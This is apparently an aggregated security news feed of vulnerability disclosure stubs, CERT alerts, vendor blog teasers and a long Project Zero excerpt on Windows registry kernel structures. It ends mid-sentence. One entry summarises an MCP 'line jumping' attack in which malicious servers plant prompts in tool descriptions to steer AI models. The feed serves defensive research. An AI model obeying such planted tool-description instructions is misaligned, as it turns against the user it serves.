A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'kimiya' was reported to the affected vendor on: 2025-04-22, 45 days ago. The vendor is given until 2025-08-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26842: Delta Electronics
2025-04-22T05:00:00Z | 1745298000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Natnael Samson (@NattiSamson)' was reported to the affected vendor on: 2025-04-22, 45 days ago. The vendor is given until 2025-08-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26720: Delta Electronics
2025-04-22T05:00:00Z | 1745298000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Natnael Samson (@NattiSamson)' was reported to the affected vendor on: 2025-04-22, 45 days ago. The vendor is given until 2025-08-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26718: Delta Electronics
2025-04-22T05:00:00Z | 1745298000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Natnael Samson (@NattiSamson)' was reported to the affected vendor on: 2025-04-22, 45 days ago. The vendor is given until 2025-08-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
High Threat Security Alert (A25-04-16): Multiple Vulnerabilities in Apple Products
2025-04-22T04:00:00Z | 1745294400

Apple has released iOS 18.4.1, iPadOS 18.4.1, macOS Sequoia 15.4.1, tvOS 18.4.1 and visionOS 2.4.1 to fix the multiple vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-17): Multiple Vulnerabilities in Cisco Products
2025-04-22T04:00:00Z | 1745294400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-18): Vulnerability in SonicWall Connect Tunnel Windows Client
2025-04-22T04:00:00Z | 1745294400

SonicWall released a security advisory to address a vulnerability in Connect Tunnel Windows Client.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A25-04-19): Vulnerability in SonicWall SMA 100 Series Products
2025-04-22T04:00:00Z | 1745294400

SonicWall released a security advisory to address vulnerability in SMA 100 series products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-20): Multiple Vulnerabilities in Microsoft Edge
2025-04-22T04:00:00Z | 1745294400

Microsoft released a security update to address vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A25-04-21): Multiple Vulnerabilities in Cisco Products
2025-04-22T04:00:00Z | 1745294400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
The Massive, Hidden Infrastructure Enabling Big Game Hunting at Scale
2025-04-22T00:00:00Z | 1745280000

Discover how cybercriminals use malicious Traffic Distribution Systems like TAG-124 to deliver ransomware and malware to high-value targets in healthcare and critical infrastructure.

https://www.recordedfuture.com/blog/massive-hidden-infrastructure-enabling-big-game-hunting-at-scale
Jumping the line: How MCP servers can attack you before you ever use them
2025-04-21T14:30:00Z | 1745245800

This post is about a vulnerability in the Model Context Protocol (MCP) called “Line Jumping,” where malicious servers can inject prompts through tool descriptions to manipulate AI model behavior without being explicitly invoked, effectively bypassing security measures designed to protect users.

https://blog.trailofbits.com/2025/04/21/jumping-the-line-how-mcp-servers-can-attack-you-before-you-ever-use-them/
Kicking off AIxCC’s Finals with Buttercup
2025-04-21T13:00:00Z | 1745240400

Trail of Bits’ Cyber Reasoning System “Buttercup” is competing in DARPA’s AI Cyber Challenge Finals, which now features increased budgets, multiple rounds, diverse challenge types, and the ability to use custom AI models.

https://blog.trailofbits.com/2025/04/21/kicking-off-aixccs-finals-with-buttercup/
5 Myths About DDoS Attacks and Protection
2025-04-21T12:18:56Z | 1745237936

Distributed denial-of-service (DDoS) attacks come in many shapes and sizes, as do the myths surrounding them. These myths can center on motivations, DDoS attack vectors and techniques, mitigation strategies, and more. DDoS myths are also sometimes more dangerous than the attacks themselves because the misconceptions...

https://www.netscout.com/blog/5-myths-about-ddos-attacks-and-protection
Helping Our Customers Develop a Sustainability Strategy
2025-04-21T12:00:00Z | 1745236800

https://www.akamai.com/blog/sustainability/2025/apr/helping-our-customers-develop-a-sustainability-strategy
5 Urgent Signs You Need An Automated VAPT Tool (Before It’s Too Late!)
2025-04-21T10:38:19Z | 1745231899

Imagine waking up to news that your company’s data has been leaked, your customers' trust is shattered, and your brand’s reputation is in tatters. Cybercriminals don’t wait for you to react—they exploit vulnerabilities the moment they find them. You're already playing a dangerous game if your security measures are outdated or reactive.

https://www.appknox.com/blog/signs-you-need-an-automated-vapt-tool
False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation
2025-04-21T10:00:56Z | 1745229656

North Korean IT workers are reportedly using real-time deepfakes to secure remote work, raising serious security concerns. We explore the implications. The post False Face: Unit 42 Demonstrates the Alarming Ease of Synthetic Identity Creation appeared first on Unit 42.

https://unit42.paloaltonetworks.com/north-korean-synthetic-identity-creation/
FISMA Compliance: A Guide for Enterprises
2025-04-21T09:00:58Z | 1745226058

The Federal Information Security Management Act (FISMA) provides a structured approach to safeguarding government information and assets against security threats. This guide breaks down the key aspects of FISMA compliance,...

https://www.firemon.com/blog/fisma-compliance-a-guide-for-enterprises/
Cyber-risks in the water sector: modernise and segment to protect yourself
2025-04-21T06:30:56Z | 1745217056

A recent study by France’s national Agence Nationale de Sécurité des Systèmes d'Information (ANSSI) information systems security agency assessed the risks to which businesses and local authorities are exposed. At least 31 compromises affecting players in the water sector in France have been examined by ANSSI since... The post Cyber-risks in the water sector: modernise and segment to protect yourself appeared first on Stormshield.

https://www.stormshield.com/news/cyber-risks-in-the-water-sector-modernise-and-segment-to-protect-yourself/
Time to kick out Human Error?
2025-04-21T00:30:00Z | 1745195400

Last year I opened a presentation with this: «Human error are the words cyber security guys use when they don't know shit». The response was laughter. But I think it is true. Here's why, and why it's relevant to incident responders.

https://www.first.org/blog/20250418-Human-Error
Time to kick out Human Error?
2025-04-21T00:30:00Z | 1745195400

Last year I opened a presentation with this: «Human error are the words cyber security guys use when they don't know shit». The response was laughter. But I think it is true. Here's why, and why it's relevant to incident responders.

https://www.first.org/blog/20250418-Human-Error
Enhancing Coalition Collaboration with Scalable Cross Domain Solutions
2025-04-20T14:48:03Z | 1745160483

Secure, seamless collaboration across varying classification levels and domains remains critical for modern warfare, especially as adversaries increasingly exploit cyber vulnerabilities to disrupt multi-domain operations. As these threats grow more sophisticated, the pressure mounts to enable real-time data sharing between agencies and with mission partners while adhering to strict compliance standards. Integrating scalable cross domain... View Article The post Enhancing Coalition Collaboration with Scalable Cross Domain Solutions appeared first on Owl Cyber Defense.

https://owlcyberdefense.com/blog/collaboration-scalable-crossdomain-solutions/
Implementation Services for K-12
2025-04-18T20:33:06Z | 1745008386

The post Implementation Services for K-12 appeared first on iboss.

https://www.iboss.com/solution-briefs/implementation-services-for-k12/
Sneak peek: A new ASN.1 API for Python
2025-04-18T13:00:00Z | 1744981200

We’re working on integrating an ASN.1 API into PyCA Cryptography, built on top of the same Rust ASN.1 implementation already used by Cryptography’s X.509 APIs.

https://blog.trailofbits.com/2025/04/18/sneak-peek-a-new-asn.1-api-for-python/
Data Is on the Menu ? and AI?s Market Price Is High
2025-04-18T12:00:00Z | 1744977600

https://www.akamai.com/blog/security/2025/apr/llm-scraper-bots-data-collection
When vulnerability information flows are vulnerable themselves
2025-04-18T00:00:00Z | 1744934400

The recent uncertainty around MITRE's CVE database highlights a major risk in relying on a single intel source. Learn why diversified, multi-source vulnerability intelligence is crucial for cyber resilience.

https://www.recordedfuture.com/blog/when-vulnerability-information-flows-are-vulnerable-themselves
Implementation Services for Enterprise and Government
2025-04-17T23:29:38Z | 1744932578

The post Implementation Services for Enterprise and Government appeared first on iboss.

https://www.iboss.com/solution-briefs/implementation-services-for-enterprise-and-government/
Chromium: CVE-2025-3620 Use after free in USB
2025-04-17T21:43:04Z | 1744926184

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202 5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3620
Chromium: CVE-2025-3619 Heap buffer overflow in Codecs
2025-04-17T21:42:59Z | 1744926179

This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](https://chromereleases.googleblog.com/202 5) for more information.

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-3619
Moving CVEs past one-nation control
2025-04-17T20:57:00Z | 1744923420

A near-miss episode of attempted defunding spotlights a need for a better way

https://news.sophos.com/en-us/2025/04/17/moving-cves-past-one-nation-control/
Tenable Wins AI Security Category in the 2025 Cybersecurity Excellence Awards
2025-04-17T13:00:00Z | 1744894800

Tenable®, the exposure management company, today announced that Tenable Vulnerability Management was named the AI-Powered Vulnerability Management category winner for the 2025 Cybersecurity Excellence Awards. Tenable Vulnerability Management is an industry-leading AI-powered solution designed to help organizations proactively identify, assess and remediate vulnerabilities across an expanding attack surface. Leveraging machine learning, advanced analytics and the power of Nessus technology, it provides unmatched visibility into security risks, helping customers identify emerging threats.“At Tenable, we’re innovating our use of AI to empower our customers to improve efficiencies and focus more resources on preventing successful attacks,” said Steve Vintz, co-chief executive officer and chief financial officer, Tenable. “Winning the AI-Powered Vulnerability Management award reinforces our commitment to helping customers identify and remediate risk wherever it exists with greater speed, accuracy and efficiency.”Tenable has introduced several standout AI security capabilities in its suite of exposure management solutions, including:Tenable Vulnerability Priority Rating (VPR) - patented machine learning drives dynamic risk scoring that helps organizations prioritize and take action on the vulnerabilities that pose the greatest risk specific to their business. VPR analyzes Tenable proprietary vulnerability data, third-party vulnerability data and threat data to effectively and efficiently measure risk. Tenable ExposureAI - generative AI capabilities and services within its Tenable One Exposure Management Platform enable faster analysis, decision-making and guidance, cutting through the complexity to stay ahead of attackers. Tenable's exposure data lake is the world's largest repository of contextual exposure data, fueling the capabilities of Tenable ExposureAI. Tenable AI Aware - advanced AI and large language model (LLM) detection capabilities are designed to rapidly surface shadow AI, AI/LLM development, and any associated vulnerabilities with remediation guidelines. AI Aware provides exposure insight into AI applications, libraries and plugins so organizations can confidently expose and close AI risk, without inhibiting business operations.Stop by the Tenable booth (N-6155) at RSA Conference 2025 or book a meeting with Tenable executives to learn more about Tenable’s AI-powered exposure management solutions.At RSA Conference, Tenable’s co-chief executive officer and chief operating officer, Mark Thurmond, will give a keynote address on Wednesday, April 30 at 3:35 pm PT. His keynote will outline the future of risk reduction through exposure management to proactively identify and stop vulnerabilities before they become data breaches.About TenableTenable® is the exposure management company, exposing and closing the cybersecurity gaps that erode business value, reputation and trust. The company’s AI-powered exposure management platform radically unifies security visibility, insight and action across the attack surface, equipping modern organizations to protect against attacks from IT infrastructure to cloud environments to critical infrastructure and everywhere in between. By protecting enterprises from security exposure, Tenable reduces business risk for approximately 44,000 customers around the globe. Learn more at tenable.com. ###Media Contact:Tenabletenablepr@tenable.com

https://www.tenable.com/press-releases/tenable-wins-ai-security-category-in-the-2025-cybersecurity-excellence-awards
Business Edge Observability Is the Rx
2025-04-17T13:00:00Z | 1744894800

Patients go to the facility where the doctor or treatment care they need is located. It might be a hospital, a medical building, an urgent care facility, or a clinic. Regardless of location, the expectation has always been a quality patient care experience: The medical professional they are dealing with will be able to...

https://www.netscout.com/blog/business-edge-observability-rx
Akamai API Security Enhancements
2025-04-17T12:00:00Z | 1744891200

https://www.akamai.com/blog/security/2025/apr/akamai-api-security-enhancements
Is Perplexity AI Safe? Uncovering Security Flaws in the Android App
2025-04-17T11:20:06Z | 1744888806

The rapid rise of AI-powered applications brings innovation, but also security blind spots. As AI systems become integral to our daily lives, their security must keep pace with their capabilities. This is the focus of our AI Security Testing Series, where we analyze popular AI applications for vulnerabilities that could put users at risk.

https://www.appknox.com/blog/is-perplexity-ai-safe-uncovering-security-flaws
TeamCity Pipelines Pulse: Enhanced Notification Options
2025-04-17T10:42:45Z | 1744886565

In this TeamCity Pipelines release, we’re focusing on improving the user experience with more flexible notification options. You can now choose which specific email notifications you want to receive from the system. You can select between default or custom notification options or unsubscribe from everything. The following options are available for custom notifications: To change […]

https://blog.jetbrains.com/teamcity/2025/04/teamcity-pipelines-pulse-enhanced-notification-options/
Ransomware in focus: Meet Cl0p
2025-04-17T10:03:15Z | 1744884195

'Ransomware in focus' is our series unravelling the complexities of ransomware groups throughout the ecosystem. By detailing their business strategies, target victims, and the tactics, techniques, and procedures (TTPs) behind their operations, we hope to arm businesses with essential knowledge required to confront and overcome the challenges posed by ransomware. In this instalment, James Tytler examines the operations of Cl0p.

https://www.s-rminform.com/latest-thinking/ransomware-in-focus-meet-cl0p
More Consumers Reported Opening Credit Cards, Yet A Third Said They Don’t Know Their Credit Score
2025-04-17T09:36:34Z | 1744882594

·       The UK has seen an 8% increase in the last year in the number of consumers who said they have a credit card, while 47% of those who plan to apply for credit in the next year said they’ll apply for a new credit card in that timeframe·       Baby Boomers are the most likely to apply for a new credit card, as 46% feel their income isn’t keeping up with inflation·       34% of UK consumers are currently unaware of their credit scoreNew research by TransUnion, a global information and insights company has revealed that over the last 12 months, there has been an 8% increase in the number of UK consumers who said they have a credit card, yet a third say they don’t know their credit score.  As inflation remains above the Bank of England’s 2% target, UK adults are even more concerned about the impact on the cost of everyday goods than they were at the peak of inflation in Q1 2024 – according to findings from TransUnion. TransUnion’s Q1 2025 Consumer Pulse Study found inflation for everyday goods is still by far the biggest household financial concern for the next six months at 56%, up six percentage points from the previous quarter and a percentage point from Q1 2024.   Amid rising costs, nearly half (47%) of UK adults who said they plan to apply for new credit or to refinance existing credit in the next year, plan to apply for a new credit card, while 17% intend to request a credit limit increase for an existing card.  James O’Donnell, director of research & consulting at TransUnion in the UK, said: “Even though inflation is significantly down from where it was at its peak, UK consumers are still feeling the squeeze. For many people, income hasn’t caught up with rising costs and as household price inflation climbs up to 3.7%,i turning to credit can help make ends meet. As economic uncertainty continues in 2025, businesses and financial institutions must ensure that consumers can access the appropriate credit products to manage their finances and build resilience, without falling into unmanageable debt.” The latest TransUnion Consumer Pulse Survey finds more than three-quarters (77%) of consumers believe that access to credit is important to achieving their financial goals – rising to 93% of Millennials and 97% of Gen Z. Credit card adoption is spread unevenly across generations. Across generations surveyed, Gen Z are the least likely to own a credit card, with only 40% saying they’d ever had one, compared to the most at over three in five (73%) of Gen X and Baby Boomers. In fact, 59% of Baby Boomers who said they plan to apply for new or refinance existing credit in the next year, report that they will apply for a new credit card in that time period (the most among generations), whereas less than half of Gen Z (47%) and Millennials (41%) aim to do so (the least).  This divide may be driven by divergence in income growth. Almost half (46%) of Baby Boomers feel their household income isn’t keeping up with inflation, suggesting an increased reliance on credit usage. Meanwhile, a third (33%) of Millennials and nearly half (46%) of Gen Z believe their income is growing in line with inflation. With consumers increasingly applying for credit, many are checking their credit reports to try to improve their credit scores. Facing major financial milestones such as buying their first home, 47% of Millennials who said they monitor their credit, said they do so in order to improve their credit score – the highest of generations surveyed.  Despite their crucial role in credit applications and access to financial products, over a third (34%) of UK consumers said they don’t know what their credit score is. This rises to 49% among Baby Boomers and 36% for Gen X, the highest among generations surveyed. In fact, less than a quarter (23%) of Baby Boomers who said they check their credit score are doing so to try to improve it, the lowest among generations surveyed. This is possibly due to their more established credit histories.  Earlier this year, TransUnion released consumer research that showed one in five UK adults would consider themselves financially vulnerable. The same research found that 10% of UK adults report they wouldn’t be able to maintain their current lifestyle without credit or financing options, yet many still struggle to access credit with 9% indicating having been turned down within the last 12 months.ii TransUnion’s ebook Consumer Vulnerability: Help Improve Customer Outcomes with New Data Concepts, can help guide financial providers to understand ‘early warning’ indicators. This can help them to identify vulnerable consumers, what vulnerability means, and how consumers believe they are impacted by it. For more information on TransUnion’s insights and products, visit TransUnion’s website.

https://newsroom.transunion.co.uk/more-consumers-reported-opening-credit-cards-yet-a-third-said-they-dont-know-their-credit-score/
CapCut copycats are on the prowl
2025-04-17T09:00:00Z | 1744880400

Cybercriminals lure content creators with promises of cutting-edge AI wizardry, only to attempt to steal their data or hijack their devices instead

https://www.welivesecurity.com/en/scams/capcut-copycats-prowl/
ZDI-CAN-26975: Dassault Systèmes
2025-04-17T05:00:00Z | 1744866000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-17, 50 days ago. The vendor is given until 2025-08-15 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26848: Autodesk
2025-04-17T05:00:00Z | 1744866000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Rocco Calvi (@TecR0c) with TecSecurity' was reported to the affected vendor on: 2025-04-17, 50 days ago. The vendor is given until 2025-08-15 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26985: PDF-XChange
2025-04-17T05:00:00Z | 1744866000

A CVSS score 3.3 AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-17, 50 days ago. The vendor is given until 2025-08-15 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26971: Dassault Systèmes
2025-04-17T05:00:00Z | 1744866000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-17, 50 days ago. The vendor is given until 2025-08-15 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26901: Dassault Systèmes
2025-04-17T05:00:00Z | 1744866000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-17, 50 days ago. The vendor is given until 2025-08-15 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
ZDI-CAN-26895: Dassault Systèmes
2025-04-17T05:00:00Z | 1744866000

A CVSS score 7.8 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2025-04-17, 50 days ago. The vendor is given until 2025-08-15 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

http://www.zerodayinitiative.com/advisories/upcoming/
Mitigating ELUSIVE COMET Zoom remote control attacks
2025-04-17T04:00:00Z | 1744862400

This post describes a sophisticated social engineering campaign using Zoom’s remote control feature and provides technical solutions to protect organizations against this attack vector.

https://blog.trailofbits.com/2025/04/17/mitigating-elusive-comet-zoom-remote-control-attacks/
Cato CTRL™ Threat Research: Inside Shadow AI – Real-World Generative AI Application Usage Trends in SASE
2025-04-17T01:55:15Z | 1744854915

Executive Summary The rapid adoption of generative AI (GenAI) in the enterprise is introducing a new category of unmanaged risk known as shadow AI. Organizations frequently lack insight into which employees are using GenAI tools and how they are being accessed, resulting in visibility limitations, policy enforcement challenges, and increased risk of data exposure. Security... The post Cato CTRL™ Threat Research: Inside Shadow AI – Real-World Generative AI Application Usage Trends in SASE  appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-inside-shadow-ai/
Iran’s AI Ambitions: Balancing Economic Isolation with National Security Imperatives
2025-04-17T00:00:00Z | 1744848000

Explore how Iran is leveraging AI for cyberwarfare, influence ops, military tech, and domestic surveillance. A deep dive into Tehran’s top-down AI strategy, partnerships with China and Russia, and implications for global security.

https://www.recordedfuture.com/research/irans-ai-ambitions-balancing-economic-isolation-national-security-imperatives
Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis
2025-04-16T22:00:44Z | 1744840844

Agent Tesla, Remcos RAT and XLoader delivered via a complex phishing campaign. Learn how attackers are using multi-stage delivery to hinder analysis. The post Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis appeared first on Unit 42.

https://unit42.paloaltonetworks.com/phishing-campaign-with-complex-attack-chain/
The Windows Registry Adventure #6: Kernel-mode objects
2025-04-16T21:19:00Z | 1744838340

Posted by Mateusz Jurczyk, Google Project Zero Welcome back to the Windows Registry Adventure! In the previous installment of the series, we took a deep look into the internals of the regf hive format. Understanding this foundational aspect of the registry is crucial, as it illuminates the design principles behind the mechanism, as well as its inherent strengths and weaknesses. The data stored within the regf file represents the definitive state of the hive. Knowing how to parse this data is sufficient for handling static files encoded in this format, such as when writing a custom regf parser to inspect hives extracted from a hard drive. However, for those interested in how regf files are managed by Windows at runtime, rather than just their behavior in isolation, there's a whole other dimension to explore: the multitude of kernel-mode objects allocated and maintained throughout the lifecycle of an active hive. These auxiliary objects are essential for several reasons: To track all currently loaded hives, their properties (e.g., load flags), their memory mappings, and the relationships between them (especially for delta hives overlaid on top of each other).To synchronize access to keys and hives within the multithreaded Windows environment.To cache hive information for faster access compared to direct memory mapping lookups.To integrate the registry with the NT Object Manager and support standard operations (opening/closing handles, setting/querying security descriptors, enforcing access checks, etc.).To manage the state of pending transactions before they are fully committed to the underlying hive. To address these diverse requirements, the Windows kernel employs numerous interconnected structures. In this post, we will examine some of the most critical ones, how they function, and how they can be effectively enumerated and inspected using WinDbg. It's important to note that Microsoft provides official definitions only for some registry-related structures through PDB symbols for ntoskrnl.exe. In many cases, I had to reverse-engineer the relevant code to recover structure layouts, as well as infer the types and names of particular fields and enums. Throughout this write-up, I will clearly indicate whether each structure definition is official or reverse-engineered. If you spot any inaccuracies, please let me know. The definitions presented here are primarily derived from Windows Server 2019 with the March 2022 patches (kernel build 10.0.17763.2686), which was the kernel version used for the majority of my registry code analysis. However, over 99% of registry structure definitions appear to be identical between this version and the latest Windows 11, making the information directly applicable to the latest systems as well.Hive structures Given that hives are the most intricate type of registry object, it's not surprising that their kernel-mode descriptors are equally complex and lengthy. The primary hive descriptor structure in Windows, known as _CMHIVE, spans a substantial 0x12F8 bytes – exceeding 4 KiB, the standard memory page size on x86-family architectures. Contained within _CMHIVE, at offset 0, is another structure of type _HHIVE, which occupies 0x600 bytes, as depicted in the diagram below: This relationship mirrors that of other common Windows object pairs, such as _EPROCESS / _KPROCESS and _ETHREAD / _KTHREAD. Because _HHIVE is always allocated as a component of the larger _CMHIVE structure, their pointer types are effectively interchangeable. If you encounter a decompiled access using a _HHIVE* pointer that extends beyond the size of the structure, it almost certainly indicates a reference to a field within the encompassing _CMHIVE object. But why are two distinct structures dedicated to representing a single registry hive? While technically not required, this separation likely serves to delineate fields associated with different abstraction layers of the hive. Specifically: _HHIVE manages the low-level aspects of the hive, including the hive header, bins, and cells, as well as in-memory mappings and synchronization state with its on-disk counterpart (e.g., dirty sectors)._CMHIVE handles more abstract information about the hive, such as the cache of security descriptors, pointers to high-level kernel objects like the root Key Control Block (KCB), and the associated transaction resource manager (_CM_RM structure). The next subsections will provide a deeper look into the responsibilities and inner workings of these two structures._HHIVE structure overview The primary role of the _HHIVE structure is to manage the memory-related state of a hive. This allows higher-level registry code to perform operations such as allocating, freeing, and marking cells as "dirty" without needing to handle the low-level implementation details. The _HHIVE structure comprises 49 top-level members, most of which will be described in larger groups below: 0: kd> dt _HHIVE nt!_HHIVE    +0x000 Signature        : Uint4B    +0x008 GetCellRoutine   : Ptr64     _CELL_DATA*     +0x010 ReleaseCellRoutine : Ptr64     void     +0x018 Allocate         : Ptr64     void*     +0x020 Free             : Ptr64     void     +0x028 FileWrite        : Ptr64     long     +0x030 FileRead         : Ptr64     long     +0x038 HiveLoadFailure  : Ptr64 Void    +0x040 BaseBlock        : Ptr64 _HBASE_BLOCK    +0x048 FlusherLock      : _CMSI_RW_LOCK    +0x050 WriterLock       : _CMSI_RW_LOCK    +0x058 DirtyVector      : _RTL_BITMAP    +0x068 DirtyCount       : Uint4B    +0x06c DirtyAlloc       : Uint4B    +0x070 UnreconciledVector : _RTL_BITMAP    +0x080 UnreconciledCount : Uint4B    +0x084 BaseBlockAlloc   : Uint4B    +0x088 Cluster          : Uint4B    +0x08c Flat             : Pos 0, 1 Bit    +0x08c ReadOnly         : Pos 1, 1 Bit    +0x08c Reserved         : Pos 2, 6 Bits    +0x08d DirtyFlag        : UChar    +0x090 HvBinHeadersUse  : Uint4B    +0x094 HvFreeCellsUse   : Uint4B    +0x098 HvUsedCellsUse   : Uint4B    +0x09c CmUsedCellsUse   : Uint4B    +0x0a0 HiveFlags        : Uint4B    +0x0a4 CurrentLog       : Uint4B    +0x0a8 CurrentLogSequence : Uint4B    +0x0ac CurrentLogMinimumSequence : Uint4B    +0x0b0 CurrentLogOffset : Uint4B    +0x0b4 MinimumLogSequence : Uint4B    +0x0b8 LogFileSizeCap   : Uint4B    +0x0bc LogDataPresent   : [2] UChar    +0x0be PrimaryFileValid : UChar    +0x0bf BaseBlockDirty   : UChar    +0x0c0 LastLogSwapTime  : _LARGE_INTEGER    +0x0c8 FirstLogFile     : Pos 0, 3 Bits    +0x0c8 SecondLogFile    : Pos 3, 3 Bits    +0x0c8 HeaderRecovered  : Pos 6, 1 Bit    +0x0c8 LegacyRecoveryIndicated : Pos 7, 1 Bit    +0x0c8 RecoveryInformationReserved : Pos 8, 8 Bits    +0x0c8 RecoveryInformation : Uint2B    +0x0ca LogEntriesRecovered : [2] UChar    +0x0cc RefreshCount     : Uint4B    +0x0d0 StorageTypeCount : Uint4B    +0x0d4 Version          : Uint4B    +0x0d8 ViewMap          : _HVP_VIEW_MAP    +0x110 Storage          : [2] _DUALSignature Equal to 0xBEE0BEE0, it is a unique signature of the _HHIVE / _CMHIVE structures. It may be useful in digital forensics for identifying these structures in raw memory dumps, and is yet another reference to bees in the Windows registry implementation.Function pointers Next up, there are six function pointers, initialized in HvHiveStartFileBacked and HvHiveStartMemoryBacked, and pointing at internal kernel handlers for the following operations: Pointer name Pointer value Operation GetCellRoutine HvpGetCellPaged or HvpGetCellFlat Translate cell index to virtual address ReleaseCellRoutine HvpReleaseCellPaged or HvpReleaseCellFlat Release previously translated cell index Allocate CmpAllocate Allocate kernel memory within global registry quota Free CmpFree Free kernel memory within global registry quota FileWrite CmpFileWrite Write data to hive file FileRead CmpFileRead Read data from hive file As we can see, these functions provide the basic functionality of operating on kernel memory, cell indexes, and the hive file. In my opinion, the most important of them is GetCellRoutine, whose typical destination, HvpGetCellPaged, performs the cell map walk in order to translate a cell index into the corresponding address within the hive mapping. It is natural to think that these function pointers could prove useful for exploitation if an attacker managed to corrupt them through a buffer overflow or a use-after-free condition. That was indeed the case in Windows 10 and earlier, but in Windows 11, these calls are now de-virtualized, and most call sites reference one of HvpGetCellPaged / HvpGetCellFlat and HvpReleaseCellPaged / HvpReleaseCellFlat directly, without referring to the pointers. This is great for security, as it completely eliminates the usefulness of those fields in any offensive scenarios. Here's an example of a GetCellRoutine call in Windows 10, disassembled in IDA Pro: And the same call in Windows 11: Hive load failure information This is a pointer to a public _HIVE_LOAD_FAILURE structure, which is passed as the first argument to the SetFailureLocation function every time an error occurs while loading a hive. It can be helpful in tracking which validity checks have failed for a given hive, without having to trace the entire loading process.Base block A pointer to a copy of the hive header, represented by the _HBASE_BLOCK structure.Synchronization locks There are two locks with the following purpose:FlusherLock – synchronizes access to the hive between clients changing data inside cells and the flusher thread;WriterLock – synchronizes access to the hive between writers that modify the bin/cell layout. They are officially of type _CMSI_RW_LOCK, but they boil down to _EX_PUSH_LOCK, and they are used with standard kernel APIs such as ExAcquirePushLockSharedEx.Dirty blocks information Between offsets 0x58 and 0x84, _HHIVE stores several data structures representing the state of synchronization between the in-memory and on-disk instances of the hive.Hive flags First of all, there are two flags at offset 0x8C that indicate if the hive mapping is flat and if the hive is read-only. Secondly, there is a 32-bit HiveFlags member that stores further flags which aren't (as far as I know) included in any public Windows symbols. I have managed to reverse-engineer and infer the meaning of the constants I have observed, resulting in the following enum: enum _HV_HIVE_FLAGS {   HIVE_VOLATILE                      = 0x1,   HIVE_NOLAZYFLUSH                   = 0x2,   HIVE_PRELOADED                     = 0x10,   HIVE_IS_UNLOADING                  = 0x20,   HIVE_COMPLETE_UNLOAD_STARTED       = 0x40,   HIVE_ALL_REFS_DROPPED              = 0x80,   HIVE_ON_PRELOADED_LIST             = 0x400,   HIVE_FILE_READ_ONLY                = 0x8000,   HIVE_SECTION_BACKED                = 0x20000,   HIVE_DIFFERENCING                  = 0x80000,   HIVE_IMMUTABLE                     = 0x100000,   HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL = 0x800000, }; Below is a one-liner explanation of each flag:HIVE_VOLATILE: the hive exists in memory only; set, e.g., for \Registry and \Registry\Machine\HARDWARE.HIVE_NOLAZYFLUSH: changes to the hive aren't automatically flushed to disk and require a manual flush; set, e.g., for \Registry\Machine\SAM.HIVE_PRELOADED: the hive is one of the default, system ones; set, e.g., for \Registry\Machine\SOFTWARE, \Registry\Machine\SYSTEM, etc.HIVE_IS_UNLOADING: the 